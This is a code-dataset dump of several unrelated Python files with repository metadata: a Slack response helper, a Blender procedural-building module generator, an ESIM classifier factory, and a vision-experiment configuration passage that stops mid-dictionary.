|
94b8c5b9f8b12423393c68f7d9f910258840ed18
|
[
"BSD-3-Clause"
] | 3
|
2019-12-12T05:17:44.000Z
|
2022-03-11T23:40:50.000Z
|
foxylib/tools/messenger/slack/methods/response_tool.py
|
foxytrixy-com/foxylib
|
94b8c5b9f8b12423393c68f7d9f910258840ed18
|
[
"BSD-3-Clause"
] | 2
|
2019-10-16T17:39:34.000Z
|
2020-02-10T06:32:08.000Z
|
class SlackResponseTool:
    """Small helpers for inspecting Slack Web API response objects."""

    @classmethod
    def response2is_ok(cls, response):
        """Return True iff *response* reports success.

        Uses an identity check so only the boolean True (not 1 or other
        truthy values) counts as success, matching the original behavior.
        """
        return response["ok"] is True

    @classmethod
    def response2j_response(cls, response):
        """Return the JSON payload of *response* (its ``data`` attribute)."""
        return response.data

    # Backward-compatible alias: the method was originally published under
    # this misspelled name; keep it so existing callers don't break.
    response2j_resopnse = response2j_response
| 23.333333
| 43
| 0.690476
| 22
| 210
| 6.5
| 0.636364
| 0.195804
| 0.237762
| 0.34965
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012422
| 0.233333
| 210
| 8
| 44
| 26.25
| 0.875776
| 0
| 0
| 0.285714
| 0
| 0
| 0.009524
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.285714
| 0.714286
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
ac02f6d2e73030d01549481649f9ef6c0c326870
| 100
|
py
|
Python
|
api/crud/__init__.py
|
p0lygun/astounding-arapaimas
|
f82dbb2ec75ab7d98da6a46a1276c12583048b3c
|
[
"MIT"
] | null | null | null |
api/crud/__init__.py
|
p0lygun/astounding-arapaimas
|
f82dbb2ec75ab7d98da6a46a1276c12583048b3c
|
[
"MIT"
] | 19
|
2021-07-11T10:02:08.000Z
|
2021-07-20T14:58:29.000Z
|
api/crud/__init__.py
|
p0lygun/astounding-arapaimas
|
f82dbb2ec75ab7d98da6a46a1276c12583048b3c
|
[
"MIT"
] | null | null | null |
from api.crud.crud_game import game # noqa: F401
from api.crud.crud_user import user # noqa: F401
| 33.333333
| 49
| 0.76
| 18
| 100
| 4.111111
| 0.444444
| 0.189189
| 0.297297
| 0.405405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 0.16
| 100
| 2
| 50
| 50
| 0.809524
| 0.21
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ac30bc1e464669d5413efdbe71a1c6c4a78edb9c
| 14,676
|
py
|
Python
|
BlenderProject/ProceduralBuildingGenerator/generateModules.py
|
AlexMG99/ProceduralBuildingGeneratorTool
|
6cf8619449385d8d78561b66c93b43b5ee8a2443
|
[
"MIT"
] | 3
|
2021-06-21T17:02:51.000Z
|
2022-03-25T16:03:31.000Z
|
BlenderProject/ProceduralBuildingGenerator/generateModules.py
|
AlexMG99/ProceduralBuildingGeneratorTool
|
6cf8619449385d8d78561b66c93b43b5ee8a2443
|
[
"MIT"
] | null | null | null |
BlenderProject/ProceduralBuildingGenerator/generateModules.py
|
AlexMG99/ProceduralBuildingGeneratorTool
|
6cf8619449385d8d78561b66c93b43b5ee8a2443
|
[
"MIT"
] | null | null | null |
import bpy, bmesh
import random as rand
from . import utilities
from . import material
from . import generateAssets
# Generate module window
def generateModuleWindow(obj, windowSize, windowType):
    """Carve a window opening into the wall plane *obj* and populate it.

    Side effects: mutates *windowSize* in place (random jitter is added to
    both entries), edits the mesh via bpy.ops operators (order-dependent),
    assigns a wall material, and finally rotates the object -90° about X.
    NOTE(review): face/edge indices (6; UV idx [1, 2, 8, 13]) assume the
    exact topology produced by the preceding cuts — confirm before reuse.
    """
    bpy.data.objects[obj.name].select_set(True)
    # Randomness: jitter the window dimensions per building randomness factor.
    buildingParameters = bpy.context.scene.buildingParameters
    windowSize[0] += rand.uniform(-0.1, 0.1) * buildingParameters.randomnessBuilding
    windowSize[1] += rand.uniform(-0.1, 0.1) * buildingParameters.randomnessBuilding
    # Go to edit mode, face selection modes
    bpy.ops.object.mode_set( mode = 'EDIT' )
    bpy.ops.mesh.select_mode( type = 'FACE' )
    bpy.ops.mesh.select_all( action = 'SELECT' )
    # Generate the window frame ----------------------------------------------------------------------------- #
    # Cut window in two (vertical loop cut)
    bpy.ops.mesh.loopcut_slide(MESH_OT_loopcut={"number_cuts":1,
                                                "smoothness":0,
                                                "falloff":'INVERSE_SQUARE',
                                                "object_index":0,
                                                "edge_index":1,
                                                "mesh_select_mode_init":(False, True, False)},
                               TRANSFORM_OT_edge_slide={"value":0})
    # Apply bevel: turns the cut into a strip of windowSize[0] width.
    bpy.ops.mesh.bevel(offset=windowSize[0], offset_pct=0, affect='EDGES')
    # Cut in half the plane (horizontal loop cut)
    bpy.ops.mesh.loopcut_slide(MESH_OT_loopcut={"number_cuts":1,
                                                "smoothness":0,
                                                "falloff":'INVERSE_SQUARE',
                                                "object_index":0,
                                                "edge_index":5,
                                                "mesh_select_mode_init":(False, True, False)},
                               TRANSFORM_OT_edge_slide={"value":0})
    # Apply bevel for the window height.
    bpy.ops.mesh.bevel(offset=windowSize[1], offset_pct=0, affect='EDGES')
    # Deselect all and select middle face (the window opening).
    bpy.ops.mesh.select_all( action = 'DESELECT' )
    utilities.selectFaceByIndex(obj, 6)
    # Push the opening inwards to create the window recess.
    bpy.ops.mesh.extrude_region_move(MESH_OT_extrude_region={"use_normal_flip":False,
                                                             "use_dissolve_ortho_edges":False,
                                                             "mirror":False},
                                     TRANSFORM_OT_translate={"value":(0, 0, -0.25)})
    # Generate UVS and add material to object
    bpy.ops.mesh.select_all(action = 'DESELECT') #Deselecting all
    idx = [1, 2, 8, 13]
    material.generateUVS(obj, idx)
    # Select wall texture or color
    if(bpy.context.scene.textureParameters.wallTexture == True):
        material.addMaterial(obj, bpy.context.scene.textureParameters.wallTextures)
    else:
        material.addMaterialBase(obj, "Wall 1")
    # ------------------------------------------------------------------------------------------------------ #
    # Generate Window asset inside the opening.
    generateAssets.generateWindow(obj, windowSize[1], windowType)
    # Rotate building 90 degrees to align it with the building
    bpy.ops.object.mode_set( mode = 'OBJECT' )
    bpy.ops.transform.rotate(value=-1.5708, orient_axis='X', orient_type='GLOBAL')
# Generate door module
def generateModuleDoor(obj, doorWidth, doorHeight):
    """Carve a door opening into the wall plane *obj* and add a door asset.

    Same operator pipeline as generateModuleWindow, but the second loop cut
    is slid by *doorHeight* (so the opening reaches the floor) instead of
    being beveled. Side effects: edits the mesh in place, assigns a wall
    material, and rotates the object -90° about X.
    """
    bpy.data.objects[obj.name].select_set(True)
    # Randomness: jitter the door dimensions per building randomness factor.
    buildingParameters = bpy.context.scene.buildingParameters
    doorWidth += rand.uniform(-0.1, 0.1) * buildingParameters.randomnessBuilding
    doorHeight += rand.uniform(-0.1, 0.1) * buildingParameters.randomnessBuilding
    # Go to edit mode, face selection modes
    bpy.ops.object.mode_set( mode = 'EDIT' )
    bpy.ops.mesh.select_mode( type = 'FACE' )
    bpy.ops.mesh.select_all( action = 'SELECT' )
    # Generate the window frame ----------------------------------------------------------------------------- #
    # Cut window in two
    bpy.ops.mesh.loopcut_slide(MESH_OT_loopcut={"number_cuts":1,
                                                "smoothness":0,
                                                "falloff":'INVERSE_SQUARE',
                                                "object_index":0,
                                                "edge_index":1,
                                                "mesh_select_mode_init":(False, True, False)},
                               TRANSFORM_OT_edge_slide={"value":0})
    # Apply bevel: strip of doorWidth width.
    bpy.ops.mesh.bevel(offset=doorWidth, offset_pct=0, affect='EDGES')
    # Cut in half the plane; the slide value positions the door's top edge.
    bpy.ops.mesh.loopcut_slide(MESH_OT_loopcut={"number_cuts":1,
                                                "smoothness":0,
                                                "falloff":'INVERSE_SQUARE',
                                                "object_index":0,
                                                "edge_index":1,
                                                "mesh_select_mode_init":(False, True, False)},
                               TRANSFORM_OT_edge_slide={"value":doorHeight})
    # Deselect all and select middle faces (the door opening).
    bpy.ops.mesh.select_all( action = 'DESELECT' )
    utilities.selectFaceByIndex(obj, 2)
    # Push the opening inwards to create the door recess.
    bpy.ops.mesh.extrude_region_move(MESH_OT_extrude_region={"use_normal_flip":False,
                                                             "use_dissolve_ortho_edges":False,
                                                             "mirror":False},
                                     TRANSFORM_OT_translate={"value":(0, 0, -0.25)})
    # Generate UVS and add material to object
    bpy.ops.mesh.select_all(action = 'DESELECT') #Deselecting all
    idx = [1,8,9,15]
    material.generateUVS(obj, idx)
    # Select wall texture or color
    if(bpy.context.scene.textureParameters.wallTexture == True):
        material.addMaterial(obj, bpy.context.scene.textureParameters.wallTextures)
    else:
        material.addMaterialBase(obj, "Wall 1")
    # ------------------------------------------------------------------------------------------------------ #
    # Generate the door asset inside the opening.
    generateAssets.generateDoor(obj)
    # Rotate building 90 degrees to align it with the building
    bpy.ops.object.mode_set( mode = 'OBJECT' )
    bpy.ops.transform.rotate(value=-1.5708, orient_axis='X', orient_type='GLOBAL')
# Generate balcony module
def generateModuleBalcony(obj, balconyWidth, balconyHeight, balconyType):
    """Carve a balcony opening into *obj*, add the balcony window asset, and
    extrude floor and railing walls for the balcony.

    *balconyType* selects which side walls to close: 'Solo' (both sides),
    'Left', 'Right', or 'Middle' (no side walls).
    Side effects: edits the mesh in place, assigns materials, and rotates
    the object -90° about X.
    NOTE(review): face/edge indices (2; [9, 12, 14]; 44/45) assume the exact
    topology produced by the preceding operators — confirm before reuse.
    """
    bpy.data.objects[obj.name].select_set(True)
    # Randomness: jitter the balcony dimensions per building randomness factor.
    buildingParameters = bpy.context.scene.buildingParameters
    balconyWidth += rand.uniform(-0.1, 0.1) * buildingParameters.randomnessBuilding
    balconyHeight += rand.uniform(-0.1, 0.1) * buildingParameters.randomnessBuilding
    # Go to edit mode, face selection modes
    bpy.ops.object.mode_set( mode = 'EDIT' )
    bpy.ops.mesh.select_mode( type = 'FACE' )
    bpy.ops.mesh.select_all( action = 'SELECT' )
    # Generate the window frame ----------------------------------------------------------------------------- #
    # Cut window in two
    bpy.ops.mesh.loopcut_slide(MESH_OT_loopcut={"number_cuts":1,
                                                "smoothness":0,
                                                "falloff":'INVERSE_SQUARE',
                                                "object_index":0,
                                                "edge_index":1,
                                                "mesh_select_mode_init":(False, True, False)},
                               TRANSFORM_OT_edge_slide={"value":0})
    # Apply bevel: strip of balconyWidth width.
    bpy.ops.mesh.bevel(offset=balconyWidth, offset_pct=0, affect='EDGES')
    # Cut in half the plane; the slide value positions the opening's top edge.
    bpy.ops.mesh.loopcut_slide(MESH_OT_loopcut={"number_cuts":1,
                                                "smoothness":0,
                                                "falloff":'INVERSE_SQUARE',
                                                "object_index":0,
                                                "edge_index":1,
                                                "mesh_select_mode_init":(False, True, False)},
                               TRANSFORM_OT_edge_slide={"value":balconyHeight})
    # Deselect all and select middle face (the balcony opening).
    bpy.ops.mesh.select_all( action = 'DESELECT' )
    utilities.selectFaceByIndex(obj, 2)
    # Push the opening inwards to create the recess.
    bpy.ops.mesh.extrude_region_move(MESH_OT_extrude_region={"use_normal_flip":False,
                                                             "use_dissolve_ortho_edges":False,
                                                             "mirror":False},
                                     TRANSFORM_OT_translate={"value":(0, 0, -0.25)})
    # Generate UVS and add material to object
    bpy.ops.mesh.select_all(action = 'DESELECT') #Deselecting all
    idx = [1,8,9,15]
    material.generateUVS(obj, idx)
    # Select wall texture or color
    if(bpy.context.scene.textureParameters.wallTexture == True):
        material.addMaterial(obj, bpy.context.scene.textureParameters.wallTextures)
    else:
        material.addMaterialBase(obj, "Wall 1")
    # ------------------------------------------------------------------------------------------------------ #
    # Generate the balcony window asset inside the opening.
    generateAssets.generateBalconyWindow(obj, balconyWidth)
    # ------------------------------------------------------------------------------------------------------ #
    # External balcony surface
    bpy.ops.mesh.select_all(action = 'DESELECT') #Deselecting all
    idx = [9, 12, 14]
    utilities.selectEdgesByIndex(obj.name, idx)
    # Create balcony floor: two extrusions outward from the bottom edges.
    bpy.ops.mesh.extrude_region_move(MESH_OT_extrude_region={"use_normal_flip":False,
                                                             "use_dissolve_ortho_edges":False,
                                                             "mirror":False},
                                     TRANSFORM_OT_translate={"value":(0, 0, balconyWidth * 0.75)})
    bpy.ops.mesh.extrude_region_move(MESH_OT_extrude_region={"use_normal_flip":False,
                                                             "use_dissolve_ortho_edges":False,
                                                             "mirror":False},
                                     TRANSFORM_OT_translate={"value":(0, 0, balconyWidth * 0.2)})
    # Grow selection to cover the new floor geometry and unwrap it.
    bpy.ops.mesh.select_more()
    bpy.ops.mesh.select_more()
    bpy.ops.uv.cube_project(cube_size=1)
    bpy.ops.mesh.select_less()
    # Create balcony front wall (railing) by duplicating and extruding up.
    bpy.ops.mesh.duplicate()
    bpy.ops.mesh.extrude_region_move(MESH_OT_extrude_region={"use_normal_flip":False,
                                                             "use_dissolve_ortho_edges":False,
                                                             "mirror":False},
                                     TRANSFORM_OT_translate={"value":(0, -balconyHeight, 0)})
    bpy.ops.mesh.select_more()
    bpy.ops.mesh.select_more()
    bpy.ops.uv.cube_project(cube_size=1)
    # Close Balcony: choose which side face(s) to raise into a wall.
    if balconyType == "Solo":
        # NOTE(review): unlike Left/Right, Solo does not deselect first —
        # presumably selectFacesByIndex resets the selection; confirm.
        idx = [44, 45]
        utilities.selectFacesByIndex(obj, idx)
    elif balconyType == "Left":
        bpy.ops.mesh.select_all(action = 'DESELECT')
        utilities.selectFaceByIndex(obj, 44)
    elif balconyType == "Right":
        bpy.ops.mesh.select_all(action = 'DESELECT')
        utilities.selectFaceByIndex(obj, 45)
    if balconyType != "Middle":
        # Raise the selected side face(s) into a side wall and unwrap.
        bpy.ops.mesh.extrude_region_move(MESH_OT_extrude_region={"use_normal_flip":False,
                                                                 "use_dissolve_ortho_edges":False,
                                                                 "mirror":False},
                                         TRANSFORM_OT_translate={"value":(0, -balconyHeight, 0)})
        bpy.ops.mesh.select_more()
        bpy.ops.uv.cube_project(cube_size=1)
    # Rotate building 90 degrees to align it with the building
    bpy.ops.object.mode_set( mode = 'OBJECT' )
    bpy.ops.transform.rotate(value=-1.5708, orient_axis='X', orient_type='GLOBAL')
# Generate module wall
def generateModuleWall(obj):
    """Apply the wall material to the plain wall module *obj* and rotate it
    -90 degrees about the global X axis to align it with the building."""
    bpy.data.objects[obj.name].select_set(True)
    # Pick textured or flat base material, mirroring the other modules.
    texture_params = bpy.context.scene.textureParameters
    if texture_params.wallTexture == True:
        material.addMaterial(obj, texture_params.wallTextures)
    else:
        material.addMaterialBase(obj, "Wall 1")
    # Rotate to align with the building.
    bpy.ops.object.mode_set(mode='OBJECT')
    bpy.ops.transform.rotate(value=-1.5708, orient_axis='X', orient_type='GLOBAL')
# Generate roof module
def generateRoofModule(obj):
    """Give the roof module *obj* its material and an inset, recessed panel.

    NOTE(review): operates on the current mesh selection and appears to
    assume edit mode with faces already selected — confirm against callers.
    """
    material.addMaterial(obj, "Roof")
    # Inset window frame, then sink the inset face to create the recess.
    bpy.ops.mesh.inset(thickness=0.05, depth=0)
    bpy.ops.mesh.extrude_region_move(MESH_OT_extrude_region={"use_normal_flip":False,
                                                             "use_dissolve_ortho_edges":False,
                                                             "mirror":False},
                                     TRANSFORM_OT_translate={"value":(0, 0, -0.2)})
    # Unwrap the outer ring and recess faces.
    idx = [0,1,2,3,16,17,18,19]
    material.generateUVS(obj, idx)
| 46.443038
| 122
| 0.468793
| 1,305
| 14,676
| 5.100383
| 0.132567
| 0.049579
| 0.061599
| 0.050481
| 0.859075
| 0.852013
| 0.852013
| 0.852013
| 0.823918
| 0.823918
| 0
| 0.019857
| 0.399496
| 14,676
| 315
| 123
| 46.590476
| 0.735391
| 0.144181
| 0
| 0.743017
| 1
| 0
| 0.093855
| 0.025444
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027933
| false
| 0
| 0.027933
| 0
| 0.055866
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ac392b03a2a77a7c7fce8dd713446c0a125c86bd
| 2,502
|
py
|
Python
|
src/athene/rte/utils/estimator_definitions.py
|
UKPLab/fever-2018-team-athene
|
730e4055899680c2ce5d5be1881e36913041d490
|
[
"Apache-2.0"
] | 41
|
2019-02-11T13:49:54.000Z
|
2022-01-25T19:37:29.000Z
|
src/athene/rte/utils/estimator_definitions.py
|
j6mes/fever-athene-system
|
e2b3cd731e5675c78745d918fd2d194cfd4191ca
|
[
"Apache-2.0"
] | 22
|
2019-02-20T13:42:28.000Z
|
2022-02-09T23:29:32.000Z
|
src/athene/rte/utils/estimator_definitions.py
|
j6mes/fever-athene-system
|
e2b3cd731e5675c78745d918fd2d194cfd4191ca
|
[
"Apache-2.0"
] | 13
|
2019-03-27T08:42:40.000Z
|
2022-03-27T14:14:30.000Z
|
import numpy as np
def get_estimator(scorer_type, save_folder=None):
    """Build and return the RTE classifier for *scorer_type*.

    Supported types:
      - 'esim': submitted model, GloVe + fastText embeddings, with attention
      - 'esim_glove_no_attention': GloVe only, no attention

    Args:
        scorer_type: identifier of the model variant to construct.
        save_folder: directory used to build the checkpoint path.

    Returns:
        A configured ESIM instance.

    Raises:
        ValueError: if *scorer_type* is not one of the supported names.
    """
    # Only the ESIM implementation differs between the two variants; every
    # hyper-parameter comes from the shared Config.esim_hyper_param dict, so
    # the (previously duplicated) construction is done once below.
    if scorer_type == 'esim':
        # submitted model, glove + fasttext, with attention
        from athene.rte.deep_models.ESIM_for_ensemble import ESIM
    elif scorer_type == 'esim_glove_no_attention':
        # glove, no attention
        from athene.rte.deep_models.ESIM_for_ensemble_glove_only_no_attention \
            import ESIM
    else:
        # Bug fix: the original fell through and crashed with
        # UnboundLocalError on 'return clf'; fail fast with a clear message.
        raise ValueError("Unknown scorer_type: {!r}".format(scorer_type))

    from os import path
    from athene.utils.config import Config
    hyper_param = Config.esim_hyper_param
    pos_weight = np.asarray(hyper_param['pos_weight'], np.float32)
    clf = ESIM(random_state=Config.seed, tensorboard_logdir="logdir/",
               learning_rate=hyper_param['lr'],
               max_check_without_progress=hyper_param['max_checks_no_progress'],
               activation=hyper_param['activation'],
               initializer=hyper_param['initializer'],
               lstm_layers=hyper_param['lstm_layers'],
               optimizer=hyper_param['optimizer'],
               trainable=hyper_param['trainable'],
               batch_size=hyper_param['batch_size'],
               dropout_rate=hyper_param['dropout'],
               num_neurons=hyper_param['num_neurons'], pos_weight=pos_weight,
               ckpt_path=path.join(save_folder, Config.name + '.ckpt'),
               name=Config.name)
    return clf
| 61.02439
| 119
| 0.665468
| 300
| 2,502
| 5.196667
| 0.226667
| 0.141116
| 0.211674
| 0.282232
| 0.891597
| 0.891597
| 0.891597
| 0.891597
| 0.891597
| 0.891597
| 0
| 0.002094
| 0.236611
| 2,502
| 40
| 120
| 62.55
| 0.814136
| 0.027578
| 0
| 0.8
| 0
| 0
| 0.113169
| 0.027572
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0
| 0.2
| 0
| 0.257143
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ce2e370e2cf31c2e56f9587afdcae0351931d174
| 41,027
|
py
|
Python
|
configs/vision/smpleff.py
|
GabrieleLagani/HebbianPCA
|
2736bb3017fa30ad2c160c891d42361bc5894df5
|
[
"MIT"
] | 4
|
2021-01-30T14:53:54.000Z
|
2021-03-23T09:52:18.000Z
|
configs/vision/smpleff.py
|
GabrieleLagani/HebbianPCA
|
2736bb3017fa30ad2c160c891d42361bc5894df5
|
[
"MIT"
] | null | null | null |
configs/vision/smpleff.py
|
GabrieleLagani/HebbianPCA
|
2736bb3017fa30ad2c160c891d42361bc5894df5
|
[
"MIT"
] | 2
|
2022-03-04T08:28:44.000Z
|
2022-03-16T19:00:34.000Z
|
import neurolab.params as P
import params as PP
from .meta import *
# Registries of experiment configurations. Each maps a string id (built from
# layer index, learning rule, dataset, sample count and an optional '_da'
# data-augmentation suffix) to a config dict; they are filled by the
# generation loop below.

# Baseline gradient-descent model configs.
config_base_gdes = dict()

# Heads evaluated on top of gradient-descent-trained layers
# ('_ft' variants read fine-tuned checkpoints).
gdes_fc_on_gdes_layer = dict()
gdes_fc_on_gdes_layer_ft = dict()
hebb_fc_on_gdes_layer = dict()
hebb_fc_on_gdes_layer_ft = dict()
prec_on_gdes_layer = dict()
prec_on_gdes_layer_ft = dict()
knn_on_gdes_layer = dict()
knn_on_gdes_layer_ft = dict()
svm_on_gdes_layer = dict()
svm_on_gdes_layer_ft = dict()

# Heads evaluated on top of Hebbian-trained layers.
gdes_fc_on_hebb_layer = dict()
gdes_fc_on_hebb_layer_ft = dict()
hebb_fc_on_hebb_layer = dict()
hebb_fc_on_hebb_layer_ft = dict()
prec_on_hebb_layer_ft = dict()
knn_on_hebb_layer = dict()
knn_on_hebb_layer_ft = dict()
svm_on_hebb_layer = dict()
svm_on_hebb_layer_ft = dict()

# Heads evaluated on top of VAE-trained layers.
gdes_fc_on_vae_layer = dict()
gdes_fc_on_vae_layer_ft = dict()
hebb_fc_on_vae_layer = dict()
hebb_fc_on_vae_layer_ft = dict()
prec_on_vae_layer_ft = dict()
knn_on_vae_layer = dict()
knn_on_vae_layer_ft = dict()
svm_on_vae_layer = dict()
svm_on_vae_layer_ft = dict()
for ds in datasets:
for da in [False, True]:
for n in smpleff_regimes[ds]:
config_base_gdes[ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.gdes.model_' + str(num_layers[ds]) + 'l.Net',
P.KEY_NET_OUTPUTS: net_outputs[ds],
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_BATCHSIZE: 64,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_NUM_EPOCHS: 20 if not da else 40,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_SCHED_MANAGER: 'neurolab.optimization.sched.MultiStepSchedManager',
P.KEY_LOSS_METRIC_MANAGER: 'neurolab.optimization.metric.CrossEntMetricManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LR_DECAY: 0.5 if not da else 0.1,
P.KEY_MILESTONES: range(10, 20) if not da else [20, 30],
P.KEY_MOMENTUM: 0.9,
P.KEY_L2_PENALTY: l2_penalties[ds],
P.KEY_DROPOUT_P: 0.5,
}
for l in range(1, num_layers[ds]):
gdes_fc_on_gdes_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.gdes.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_BATCHSIZE: 64,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_NUM_EPOCHS: 20 if not da else 40,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_SCHED_MANAGER: 'neurolab.optimization.sched.MultiStepSchedManager',
P.KEY_LOSS_METRIC_MANAGER: 'neurolab.optimization.metric.CrossEntMetricManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LR_DECAY: 0.5 if not da else 0.1,
P.KEY_MILESTONES: range(10, 20) if not da else [20, 30],
P.KEY_MOMENTUM: 0.9,
P.KEY_L2_PENALTY: 5e-4,
P.KEY_DROPOUT_P: 0.5,
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/config_base_gdes[' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
gdes_fc_on_gdes_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net', 'models.gdes.fc.Net'],
P.KEY_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/config_base_gdes[' + ds+ '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_NET_OUTPUTS: ['bn' + str(l), 'fc'],
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_BATCHSIZE: 64,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_NUM_EPOCHS: 20 if not da else 40,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_SCHED_MANAGER: 'neurolab.optimization.sched.MultiStepSchedManager',
P.KEY_LOSS_METRIC_MANAGER: 'neurolab.optimization.metric.CrossEntMetricManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LR_DECAY: 0.5 if not da else 0.1,
P.KEY_MILESTONES: range(10, 20) if not da else [20, 30],
P.KEY_MOMENTUM: 0.9,
P.KEY_L2_PENALTY: l2_penalties[ds],
P.KEY_DROPOUT_P: 0.5,
}
hebb_fc_on_gdes_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.hebb.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 20,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/config_base_gdes[' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
hebb_fc_on_gdes_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.hebb.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
